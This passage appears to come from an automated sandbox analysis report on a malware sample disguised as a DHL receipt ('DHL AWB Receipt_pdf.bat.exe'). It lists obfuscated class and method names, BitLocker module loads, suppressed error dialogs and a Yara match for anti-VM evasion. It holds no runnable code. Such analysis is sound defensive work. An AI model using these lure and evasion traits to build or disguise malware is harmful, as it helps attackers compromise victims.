Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, Os3XH0xcZlZi6nQhId.cs	High entropy of concatenated method names: 'xEKLE1GjOg', 'BndLaErIhj', 'ArgLdIryj2', 'lfjLSmX4Yg', 'GUDL9IHCr4', 'iReLCFSiyl', 'BtGL6u7aCZ', 'L0hLIuP5XT', 'uV9LXJQ700', 'QFKLRo20SQ'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, yoSgyB6ej35scelZ4y.cs	High entropy of concatenated method names: 'w9NtMsWZJm', 'wVxtlFlJMM', 'KQTttKURtC', 'D5Xt3jvpev', 'IPatGkZLOZ', 'Qcxtky7hZB', 'Dispose', 'B7iH5bwwhm', 'tc9HLoDKN8', 'YMOHgHnCF0'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, rZbXDqsymswshlDjPg.cs	High entropy of concatenated method names: 'Nlcv86cLl0', 'PQKv5QrRQL', 'lKmvLdfMJU', 'YiUvg9oWm5', 'jQHvY9mNMB', 'eSevbP2tOy', 'RE3vorXqSf', 'CFHvso8bnC', 'HQWvfC04Et', 'y5KvuknYMP'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, CDr5hFTvhw7JU9oBiN.cs	High entropy of concatenated method names: 'jGXb8pASMK', 'r75bLAQHP2', 'fpTbYrviAJ', 'x7Ebol7qBl', 'gP2bsKBmIT', 'odbY9vmN5Q', 'LDtYCmjCeu', 'KqxY68O6AE', 'JMTYI69a0R', 'TA5YXy02ud'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, nDyohWL7HD6BoaxGAC.cs	High entropy of concatenated method names: 'Dispose', 't5sNXcelZ4', 'TkDZy35jHg', 'RSVmTibqcU', 'HMYNRmeqGI', 'L2FNzfaHtK', 'ProcessDialogKey', 'E9UZKLk1R5', 'F60ZNIirdL', 'ObVZZvfZVf'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, Xy8tnvPPUXtguiVQsZ.cs	High entropy of concatenated method names: 'HCRhxdmPso', 'tIRhcaA79s', 'kgmhTDgQDI', 'PCHhyNbktc', 'vnshFmUmnF', 'j59hwmeSYL', 'pbwh4yNnos', 'XGphVF5rxH', 'uRohnnK25o', 'cKlhAkXKHQ'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, HIimCbiADyaib8CJmj.cs	High entropy of concatenated method names: 'TUAbdaupfd', 'wWKbSn0uJe', 'PXCb9ZsfSn', 'ToString', 'f27bCKwy5t', 'cACb6cHKbI', 'hWlR7nhkwm8rRArvKkQ', 'yvq8rahrZYi5GYrxQW3', 'IbUpw4hVk63jGOJxfEX'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, sdTDj8EjXFGnT7ID1X.cs	High entropy of concatenated method names: 'BvHMnthnpf', 'tXGM0BGfZ2', 'nJMMEBjLif', 'rxRMaTYIBx', 'qdTMyO72bE', 'WaoMOJeCNW', 'jYXMFHD0wu', 'u3wMwuOBso', 'hKWMivx3gA', 'mvHM4oByHr'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, jp2e7vp91uIoRvxglx.cs	High entropy of concatenated method names: 'EFoY2QmLKJ', 'ghkY7KbRxG', 'UCRgOFxwre', 'kTogFkmVNj', 'eL0gwtK7pg', 'HIwgiltcv7', 'or5g4YNQXl', 'YtegVsg9Mj', 'QxGgqFZm2E', 'jDcgnJMFDm'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, cfZVfERQNqIXSf1NNt.cs	High entropy of concatenated method names: 'qGFrgUfaWm', 'iQnrY6mVq4', 'ES4rbVkLdP', 'GDqroaM7ar', 'FsTrtPj5ff', 'iiZrsuBfGM', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, UJLKuQNNpf5XVaS36Ar.cs	High entropy of concatenated method names: 'A6yrRswEyg', 'LburzUaOKs', 'y7Z3KUxy7h', 'WfH3NE0QvO', 'HDF3ZUmFNm', 'm1m3vcwvqw', 'QHY3DtXnYS', 'wHy38D4g6s', 'HAh35feKYq', 'AI13LUuELF'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, QK430adV8VWi7AuSi7.cs	High entropy of concatenated method names: 'ToString', 'KhMeABG8wC', 'Js3eyfar1j', 'lJNeOxWblH', 'PxseFw3a7S', 'YPkewCjySr', 'fy6eiILLlc', 'Etfe4XRJhl', 'QP0eVHTNc7', 'pXteqWUiwr'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, SGE5uZclA9c9PJCD0S.cs	High entropy of concatenated method names: 'nsfgQ2X9NH', 'VcRgWrxs33', 'qKcgxnXRWV', 'yGLgcVh0kd', 'OnagMYy5pk', 'Hl5geu3i2P', 'hPMglrXUyd', 'VZggHARMoI', 'fFQgtEJfZH', 'JjlgrnstkH'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, wdObHnCCXoEe19cjWr.cs	High entropy of concatenated method names: 'MmrlIiO7vQ', 'RZdlRCnyyW', 'pFMHKwLTFw', 'WudHNLiya1', 'ArClAXh8MJ', 'd7ll05LLCs', 'SHnlPPKaO4', 'NL5lEE96Uj', 'afqlaIFeSh', 'p3PldThcbe'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, CEEKcnqGhEZprMt13A.cs	High entropy of concatenated method names: 'KukoU4Tb46', 'h07oJKXVoh', 'ovyo1AFL65', 'w7doQli0Oq', 'aFPo2lngq3', 'TjVoWiSsLT', 'r9mo7YwLjT', 'AQIoxV4CaW', 'tDmocHhQIO', 'rheopNcIYH'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, QIOXdc4GID5F6QXyuF.cs	High entropy of concatenated method names: 'CwTo53mBhK', 'VNuogbMWv5', 'wR6obf19TX', 'onsbRnNuOj', 'ICabzrEIXB', 'v2goKeqpop', 'HJIoNdXDlU', 'p1XoZUwDow', 'FgXovp9m7e', 'GxDoDui3PQ'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, r76bb2DervxV8cC5SS.cs	High entropy of concatenated method names: 'hJANos3XH0', 'EZlNsZi6nQ', 'blANu9c9PJ', 'VD0NjSop2e', 'dxgNMlxWDr', 'fhFNevhw7J', 'jIZ4jjWDeraUVKGweT', 'eksBpfAmQ5rsnuMenF', 'mtaNN1fYW9', 'BvENvPEygu'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, IdpJtyzhEL3eme2asi.cs	High entropy of concatenated method names: 'hV7rWAPI0I', 'eYorxJeWGC', 'ytvrcKpA34', 'JK2rT2fJV4', 'b79rydiwHv', 'BW4rFfgkMM', 'rxhrwEIbYR', 'wsdrkdNu25', 'qpIrUxndJa', 'm3trJD8xvh'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, pLeQydZ54rrvbpik5B.cs	High entropy of concatenated method names: 'eat19MwTq', 'oDkQHn0JN', 'aXwWYraik', 'CXK71yUpV', 'FT3c0wllf', 'kL1p7c7G6', 'qvCBKrk3ib6jWVQmgM', 'iFSx1Zr0XJEaE2gUcs', 'H4XHkXJs1', 'AOvrJLSaA'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6df0000.5.raw.unpack, xLk1R5XT60IirdLAbV.cs	High entropy of concatenated method names: 'O4PtTZAsKf', 'C4GtyeI14T', 'NOatOPdS8a', 'wgLtF8v1gK', 'YFHtwn3i3B', 'D1Etik6MtV', 'CP2t4cvRhF', 'hc2tVYjxsA', 'iPZtqQtEjp', 'MMytnJErEV'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

